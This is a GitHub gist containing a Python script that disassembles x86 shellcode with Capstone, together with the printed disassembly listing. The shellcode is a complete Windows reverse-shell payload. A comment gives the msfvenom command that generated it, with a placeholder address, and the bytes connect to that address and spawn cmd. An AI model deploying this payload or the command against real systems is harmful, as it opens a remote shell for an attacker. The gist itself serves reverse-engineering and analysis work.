Created
June 19, 2018 19:14
-
-
Save pich4ya/49dfe78b007658d6877823c226a3fdb4 to your computer and use it in GitHub Desktop.
Capstone formatting, more accurate than pwntools's disasm()
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Capstone formatting, more accurate than pwntools's disasm() | |
| from capstone import * | |
| # msfvenom -p windows/shell_reverse_tcp LHOST=1.2.3.4 LPORT=1234 -f c > revshell.c | |
| # cat revshell.c |tr -d '\n\"' | |
| CODE = '\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x05\x68\x01\x02\x03\x04\x68\x02\x00\x04\xd2\x89\xe6\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0c\xff\x4e\x08\x75\xec\x68\xf0\xb5\xa2\x56\xff\xd5\x68\x63\x6d\x64\x00\x89\xe3\x57\x57\x57\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff\xd5\x89\xe0\x4e\x56\x46\xff\x30\x68\x08\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5' | |
| md = Cs(CS_ARCH_X86, CS_MODE_32) | |
| for i in md.disasm(CODE, 0x1000): | |
| raw_bytes= ''.join('{:02x}'.format(x) for x in i.bytes) | |
| print('00{0:<10}{1:<15}{2:<10}{3:<10}'.format(i.address, raw_bytes, i.mnemonic, i.op_str)) | |
| # 004096 fc cld | |
| # 004097 e882000000 call 0x1088 | |
| # 004102 60 pushal | |
| # 004103 89e5 mov ebp, esp | |
| # 004105 31c0 xor eax, eax | |
| # 004107 648b5030 mov edx, dword ptr fs:[eax + 0x30] | |
| # 004111 8b520c mov edx, dword ptr [edx + 0xc] | |
| # 004114 8b5214 mov edx, dword ptr [edx + 0x14] | |
| # 004117 8b7228 mov esi, dword ptr [edx + 0x28] | |
| # 004120 0fb74a26 movzx ecx, word ptr [edx + 0x26] | |
| # 004124 31ff xor edi, edi | |
| # 004126 ac lodsb al, byte ptr [esi] | |
| # 004127 3c61 cmp al, 0x61 | |
| # 004129 7c02 jl 0x1025 | |
| # 004131 2c20 sub al, 0x20 | |
| # 004133 c1cf0d ror edi, 0xd | |
| # 004136 01c7 add edi, eax | |
| # 004138 e2f2 loop 0x101e | |
| # 004140 52 push edx | |
| # 004141 57 push edi | |
| # 004142 8b5210 mov edx, dword ptr [edx + 0x10] | |
| # 004145 8b4a3c mov ecx, dword ptr [edx + 0x3c] | |
| # 004148 8b4c1178 mov ecx, dword ptr [ecx + edx + 0x78] | |
| # 004152 e348 jecxz 0x1082 | |
| # 004154 01d1 add ecx, edx | |
| # 004156 51 push ecx | |
| # 004157 8b5920 mov ebx, dword ptr [ecx + 0x20] | |
| # 004160 01d3 add ebx, edx | |
| # 004162 8b4918 mov ecx, dword ptr [ecx + 0x18] | |
| # 004165 e33a jecxz 0x1081 | |
| # 004167 49 dec ecx | |
| # 004168 8b348b mov esi, dword ptr [ebx + ecx*4] | |
| # 004171 01d6 add esi, edx | |
| # 004173 31ff xor edi, edi | |
| # 004175 ac lodsb al, byte ptr [esi] | |
| # 004176 c1cf0d ror edi, 0xd | |
| # 004179 01c7 add edi, eax | |
| # 004181 38e0 cmp al, ah | |
| # 004183 75f6 jne 0x104f | |
| # 004185 037df8 add edi, dword ptr [ebp - 8] | |
| # 004188 3b7d24 cmp edi, dword ptr [ebp + 0x24] | |
| # 004191 75e4 jne 0x1045 | |
| # 004193 58 pop eax | |
| # 004194 8b5824 mov ebx, dword ptr [eax + 0x24] | |
| # 004197 01d3 add ebx, edx | |
| # 004199 668b0c4b mov cx, word ptr [ebx + ecx*2] | |
| # 004203 8b581c mov ebx, dword ptr [eax + 0x1c] | |
| # 004206 01d3 add ebx, edx | |
| # 004208 8b048b mov eax, dword ptr [ebx + ecx*4] | |
| # 004211 01d0 add eax, edx | |
| # 004213 89442424 mov dword ptr [esp + 0x24], eax | |
| # 004217 5b pop ebx | |
| # 004218 5b pop ebx | |
| # 004219 61 popal | |
| # 004220 59 pop ecx | |
| # 004221 5a pop edx | |
| # 004222 51 push ecx | |
| # 004223 ffe0 jmp eax | |
| # 004225 5f pop edi | |
| # 004226 5f pop edi | |
| # 004227 5a pop edx | |
| # 004228 8b12 mov edx, dword ptr [edx] | |
| # 004230 eb8d jmp 0x1015 | |
| # 004232 5d pop ebp | |
| # 004233 6833320000 push 0x3233 | |
| # 004238 687773325f push 0x5f327377 | |
| # 004243 54 push esp | |
| # 004244 684c772607 push 0x726774c | |
| # 004249 ffd5 call ebp | |
| # 004251 b890010000 mov eax, 0x190 | |
| # 004256 29c4 sub esp, eax | |
| # 004258 54 push esp | |
| # 004259 50 push eax | |
| # 004260 6829806b00 push 0x6b8029 | |
| # 004265 ffd5 call ebp | |
| # 004267 50 push eax | |
| # 004268 50 push eax | |
| # 004269 50 push eax | |
| # 004270 50 push eax | |
| # 004271 40 inc eax | |
| # 004272 50 push eax | |
| # 004273 40 inc eax | |
| # 004274 50 push eax | |
| # 004275 68ea0fdfe0 push 0xe0df0fea | |
| # 004280 ffd5 call ebp | |
| # 004282 97 xchg eax, edi | |
| # 004283 6a05 push 5 | |
| # 004285 6801020304 push 0x4030201 | |
| # 004290 68020004d2 push 0xd2040002 | |
| # 004295 89e6 mov esi, esp | |
| # 004297 6a10 push 0x10 | |
| # 004299 56 push esi | |
| # 004300 57 push edi | |
| # 004301 6899a57461 push 0x6174a599 | |
| # 004306 ffd5 call ebp | |
| # 004308 85c0 test eax, eax | |
| # 004310 740c je 0x10e4 | |
| # 004312 ff4e08 dec dword ptr [esi + 8] | |
| # 004315 75ec jne 0x10c9 | |
| # 004317 68f0b5a256 push 0x56a2b5f0 | |
| # 004322 ffd5 call ebp | |
| # 004324 68636d6400 push 0x646d63 | |
| # 004329 89e3 mov ebx, esp | |
| # 004331 57 push edi | |
| # 004332 57 push edi | |
| # 004333 57 push edi | |
| # 004334 31f6 xor esi, esi | |
| # 004336 6a12 push 0x12 | |
| # 004338 59 pop ecx | |
| # 004339 56 push esi | |
| # 004340 e2fd loop 0x10f3 | |
| # 004342 66c744243c0101 mov word ptr [esp + 0x3c], 0x101 | |
| # 004349 8d442410 lea eax, dword ptr [esp + 0x10] | |
| # 004353 c60044 mov byte ptr [eax], 0x44 | |
| # 004356 54 push esp | |
| # 004357 50 push eax | |
| # 004358 56 push esi | |
| # 004359 56 push esi | |
| # 004360 56 push esi | |
| # 004361 46 inc esi | |
| # 004362 56 push esi | |
| # 004363 4e dec esi | |
| # 004364 56 push esi | |
| # 004365 56 push esi | |
| # 004366 53 push ebx | |
| # 004367 56 push esi | |
| # 004368 6879cc3f86 push 0x863fcc79 | |
| # 004373 ffd5 call ebp | |
| # 004375 89e0 mov eax, esp | |
| # 004377 4e dec esi | |
| # 004378 56 push esi | |
| # 004379 46 inc esi | |
| # 004380 ff30 push dword ptr [eax] | |
| # 004382 6808871d60 push 0x601d8708 | |
| # 004387 ffd5 call ebp | |
| # 004389 bbf0b5a256 mov ebx, 0x56a2b5f0 | |
| # 004394 68a695bd9d push 0x9dbd95a6 | |
| # 004399 ffd5 call ebp | |
| # 004401 3c06 cmp al, 6 | |
| # 004403 7c0a jl 0x113f | |
| # 004405 80fbe0 cmp bl, 0xe0 | |
| # 004408 7505 jne 0x113f | |
| # 004410 bb4713726f mov ebx, 0x6f721347 | |
| # 004415 6a00 push 0 | |
| # 004417 53 push ebx | |
| # 004418 ffd5 call ebp | |
| # [Finished in 0.1s] |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment